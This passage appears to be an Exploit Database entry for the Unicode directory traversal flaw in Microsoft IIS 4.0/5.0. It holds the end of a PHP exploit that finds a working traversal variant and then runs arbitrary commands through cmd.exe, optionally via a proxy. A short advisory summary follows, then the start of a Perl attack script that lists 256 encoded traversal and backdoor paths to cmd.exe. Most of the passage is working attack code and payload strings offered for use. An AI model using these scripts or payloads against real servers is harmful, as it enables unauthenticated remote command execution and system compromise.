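    echo "2) Attack with command and variants number (optionaly you can use proxy)\n";
    echo "Note : When you specify a command with spaces, replace spaces with low script \"_\" \n";
    echo "and you must double the backslash \"\\\". \nExample: " . $prog . " -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
    echo "Thanks to An-tonio for the proxy support.\n";
    echo "Bug discover by Anonymous Post.\n";
    echo "TYPE " . $prog . " spanish, for Spanish help.\n";
}

/* Print the Spanish usage text ($prog is argv[0]). */
function usage_es($prog)
{
    echo "\n\n--------------------------------------------------------------------\n";
    echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por BoloTron ----\n";
    echo "--------------------------------------------------------------------\n\n";
    echo "Uso del artefacto maligno :\n";
    echo $prog . " -t www.victima.vic\n";
    echo $prog . " -t www.victima.vic -p proxy:puerto\n";
    echo $prog . " www.victima.vic comando nº_de_variante\n";
    echo $prog . " -p proxy:port www.victima.vic comand nº_de_variante\n";
    echo "Opciones:\n";
    echo "-t --> Testea la vulnerabilidad, prueba todas las variantes hasta encontrar una buena.\n";
    echo "-p --> Ataque a traves de proxy\n";
    echo "\nModo de Empleo:\n1) Testear el host y anotar el numero de variante en caso de ser vulnerable\n";
    echo "2) Atacar especificando comando y nº de variante (opcionalmente puedes especificar un proxy)\n";
    echo "Nota : Cuando se especifica un comando en el que hay espacios hay que sustituirlos por un guion bajo _ \n";
    echo "y las contrabarras hay que ponerlas dobles. \nEjemplo : " . $prog . " -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
    echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
    echo "Bug descubierto por aviso anonimo.\n";
}

/* Split "host:port" into array(host, int port); false when malformed. */
function parse_proxy($spec)
{
    $parts = explode(":", $spec, 2);
    if (count($parts) != 2 || $parts[0] === "" || !preg_match('/^[0-9]+$/', $parts[1])) {
        return false;
    }
    return array($parts[0], (int) $parts[1]);
}

/* Request-target for one traversal path plus command: the absolute URL when
 * talking to a proxy, otherwise just the path. */
function request_target($victim, $path, $comando, $via_proxy)
{
    return ($via_proxy ? "http://" . $victim : "") . $path . $comando;
}

/* One HTTP/1.0 GET to $host:$port.  Returns the raw reply read to EOF, or
 * false when the connection could not be opened (10 s connect timeout). */
function http_get($host, $port, $request_target)
{
    $fp = @fsockopen($host, $port, $errno, $errstr, 10);
    if (!$fp) {
        return false;
    }
    fputs($fp, "GET " . $request_target . " HTTP/1.0\r\n\r\n");
    $resul = "";
    while (!feof($fp)) {
        $resul .= fgets($fp, 128);
    }
    fclose($fp);
    return $resul;
}

if (!isset($argv[1])) {
    usage_en($argv[0]);
    exit;
}
if ($argv[1] == "spanish") {
    usage_es($argv[0]);
    exit;
}

if ($argv[1] == "-t") {
    /* Test mode: -t <host> [-p proxy:port].  Stop at the first variant whose
     * reply contains a "<DIR>" entry, i.e. a real directory listing. */
    if (!isset($argv[2])) {
        usage_en($argv[0]);
        exit;
    }
    $victim = $argv[2];
    $via_proxy = isset($argv[3]) && $argv[3] == "-p";
    if ($via_proxy) {
        $prox = isset($argv[4]) ? parse_proxy($argv[4]) : false;
        if ($prox === false) {
            echo "Bad proxy, expected host:port\n";
            exit;
        }
        list($conn_host, $conn_port) = $prox;
    } else {
        $conn_host = $victim;
        $conn_port = 80;
    }
    $comando = "dir+c:\\";
    foreach ($vector_ataque as $i => $path) {
        echo "Trying variant number " . $i . " ";
        $resul = http_get($conn_host, $conn_port, request_target($victim, $path, $comando, $via_proxy));
        if ($resul === false) {
            echo "Conection failed...\n";
            continue;
        }
        if (strpos($resul, "<DIR>") !== false) {
            echo "-----> Vulnerable!!\n";
            exit;
        }
        echo "-----> Not Vulnerable :(\n";
    }
    exit;
}

/* Attack mode: [-p proxy:port] <host> <command> <variant>. */
if ($argv[1] == "-p") {
    if (!isset($argv[5])) {
        usage_en($argv[0]);
        exit;
    }
    $prox = parse_proxy($argv[2]);
    if ($prox === false) {
        echo "Bad proxy, expected host:port\n";
        exit;
    }
    list($conn_host, $conn_port) = $prox;
    $victim = $argv[3];
    $cmd_arg = $argv[4];
    $n_arg = $argv[5];
    $via_proxy = true;
} else {
    if (!isset($argv[3])) {
        usage_en($argv[0]);
        exit;
    }
    $conn_host = $argv[1];
    $conn_port = 80;
    $victim = $argv[1];
    $cmd_arg = $argv[2];
    $n_arg = $argv[3];
    $via_proxy = false;
}
if (!preg_match('/^[0-9]+$/', $n_arg) || !isset($vector_ataque[(int) $n_arg])) {
    echo "Variant number must be 0.." . (count($vector_ataque) - 1) . "\n";
    exit;
}
/* "_" stands for a space in the command (see usage). */
$comando = str_replace("_", "+", $cmd_arg);
$resul = http_get($conn_host, $conn_port,
                  request_target($victim, $vector_ataque[(int) $n_arg], $comando, $via_proxy));
if ($resul === false) {
    echo "Conection failed.\n";
} else {
    echo $resul;
}
?>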
Exploit Database EDB-ID : 20302
Publication date : 2000-10-16 22h00 +00:00
Author : Andrea Spabam
EDB Verified : Yes
source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
##########################################################
# Spawn Ms-Doz-like Shell on MicrosoZ IIS
# on IIS vulnerable servers using 450 ways
# (like Unicode, Codered, corrupt string and Backdoor)
# NOW SUPPORT ALL UNIX SYSTEM !
# Use port number with SSLproxy for testing SSL sites
# Andrea Spabam 2001 GPL2 or higher
#
[email protected]
# This Script is currently under development
# link to http://spabam.da.ru to get latest version
##########################################################
use strict;
use IO::Socket;

# File-scope state shared by every sub below (none of them take arguments):
#   $host, $port  - target, filled in by &host
#   $command      - "dir" during the sweep, afterwards whatever the user types
#   $url          - the table entry currently selected
#   $probe        - "string" | "scan" | "command"; selects what &connect sends
#   @results      - response lines captured by the most recent &connect
#   @U            - table of request-path prefixes, assigned one per line
#                   below; $U[0] is left empty for a user-typed entry (&other)
my ($host, $port, $command, $url, $probe);
my (@results, @U);
$U[1] = "/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[2] = "/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[3] = "/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[4] = "/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[5] = "..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[6] = "/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[7] = "/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[8] = "/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[9] = "/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[10] = "/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[11] = "/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[12] = "/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[13] = "/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[14] = "/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[15] = "/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[16] = "/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[17] = "/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[18] = "/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[20] = "/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[21] = "/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[22] = "/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[23] = "/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[24] = "/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[25] = "/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[26] = "/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[27] = "/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[28] = "/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[29] = "/root.exe?/c+";
$U[30] = "/cmd.exe?/c+";
$U[31] = "/sensepost.exe?/c+";
$U[32] = "/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[33] = "/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[34] = "/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[35] = "/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[36] = "/MSADC/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[37] = "/MSADC/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[38] = "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[39] = "/MSADC/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[40] = "/MSADC..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[41] = "/MSADC/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[42] = "/MSADC/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[43] = "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[44] = "/MSADC/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[45] = "/MSADC/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[46] = "/MSADC/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[47] = "/MSADC/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[48] = "/MSADC/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[49] = "/MSADC/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[50] = "/MSADC/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[51] = "/MSADC/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[52] = "/MSADC/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[53] = "/MSADC/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[54] = "/MSADC/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[55] = "/MSADC/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[56] = "/MSADC/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[57] = "/MSADC/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[58] = "/MSADC/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[59] = "/MSADC/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[60] = "/MSADC/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[61] = "/MSADC/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[62] = "/MSADC/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[63] = "/MSADC/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[64] = "/MSADC/root.exe?/c+";
$U[65] = "/MSADC/cmd.exe?/c+";
$U[66] = "/MSADC/sensepost.exe?/c+";
$U[67] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[68] = "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[69] = "/MSADC/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[70] = "/MSADC/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[71] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[72] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[73] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[74] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[75] = "/msadc..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[76] = "/msadc/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[77] = "/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[78] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[79] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[80] = "/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[81] = "/msadc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[82] = "/msadc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[83] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[84] = "/msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[85] = "/msadc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[86] = "/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[87] = "/msadc/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[88] = "/msadc/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[89] = "/msadc/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[90] = "/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[91] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[92] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[93] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[94] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[95] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[96] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[97] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[98] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[99] = "/msadc/root.exe?/c+";
$U[100] = "/msadc/cmd.exe?/c+";
$U[101] = "/msadc/sensepost.exe?/c+";
$U[102] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[103] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[104] = "/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[105] = "/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[106] = "/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[107] = "/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[108] = "/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[109] = "/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[110] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[111] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[112] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[113] = "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[114] = "/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[115] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[116] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[117] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[118] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[119] = "/scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[120] = "/scripts/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[121] = "/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[122] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[123] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[124] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[125] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[126] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[127] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[128] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[129] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[130] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[131] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[132] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[133] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[134] = "/scripts/root.exe?/c+";
$U[135] = "/scripts/cmd.exe?/c+";
$U[136] = "/scripts/sensepost.exe?/c+";
$U[137] = "/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[138] = "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[139] = "/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[140] = "/scripts/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[141] = "/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[142] = "/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[143] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[144] = "/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[145] = "/PBServer..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[146] = "/PBServer/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[147] = "/PBServer/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[148] = "/PBServer/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[149] = "/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[150] = "/PBServer/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[151] = "/PBServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[152] = "/PBServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[153] = "/PBServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[154] = "/PBServer/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[155] = "/PBServer/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[156] = "/PBServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[157] = "/PBServer/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[158] = "/PBServer/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[159] = "/PBServer/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[160] = "/PBServer/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[161] = "/PBServer/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[162] = "/PBServer/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[163] = "/PBServer/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[164] = "/PBServer/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[165] = "/PBServer/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[166] = "/PBServer/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[167] = "/PBServer/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[168] = "/PBServer/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[169] = "/PBServer/root.exe?/c+";
$U[170] = "/PBServer/cmd.exe?/c+";
$U[171] = "/PBServer/sensepost.exe?/c+";
$U[172] = "/PBServer/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[173] = "/PBServer/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[174] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[175] = "/PBServer/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[176] = "/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[177] = "/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[178] = "/Rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[179] = "/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[180] = "/Rpc..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[181] = "/Rpc/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[182] = "/Rpc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[183] = "/Rpc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[184] = "/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[185] = "/Rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[186] = "/Rpc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[187] = "/Rpc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[188] = "/Rpc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[189] = "/Rpc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[190] = "/Rpc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[191] = "/Rpc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[192] = "/Rpc/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[193] = "/Rpc/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[194] = "/Rpc/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[195] = "/Rpc/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[196] = "/Rpc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[197] = "/Rpc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[198] = "/Rpc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[199] = "/Rpc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[200] = "/Rpc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[201] = "/Rpc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[202] = "/Rpc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[203] = "/Rpc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[204] = "/Rpc/root.exe?/c+";
$U[205] = "/Rpc/cmd.exe?/c+";
$U[206] = "/Rpc/sensepost.exe?/c+";
$U[207] = "/Rpc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[208] = "/Rpc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[209] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[210] = "/Rpc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[211] = "/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[212] = "/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[213] = "/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[214] = "/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[215] = "/samples..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[216] = "/samples/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[217] = "/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[218] = "/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[219] = "/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[220] = "/samples/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[221] = "/samples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[222] = "/samples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[223] = "/samples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[224] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[225] = "/samples/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[226] = "/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[227] = "/samples/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[228] = "/samples/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[229] = "/samples/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[230] = "/samples/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[231] = "/samples/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[232] = "/samples/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[233] = "/samples/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[234] = "/samples/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[235] = "/samples/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[236] = "/samples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[237] = "/samples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[238] = "/samples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[239] = "/samples/root.exe?/c+";
$U[240] = "/samples/cmd.exe?/c+";
$U[241] = "/samples/sensepost.exe?/c+";
$U[242] = "/samples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[243] = "/samples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[244] = "/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[245] = "/samples/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[246] = "/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[247] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[248] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[249] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[250] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[251] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[252] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[253] = "/_vti_bin/..%c0%af../..%c0%1f../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[254] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[255] = "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[256] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
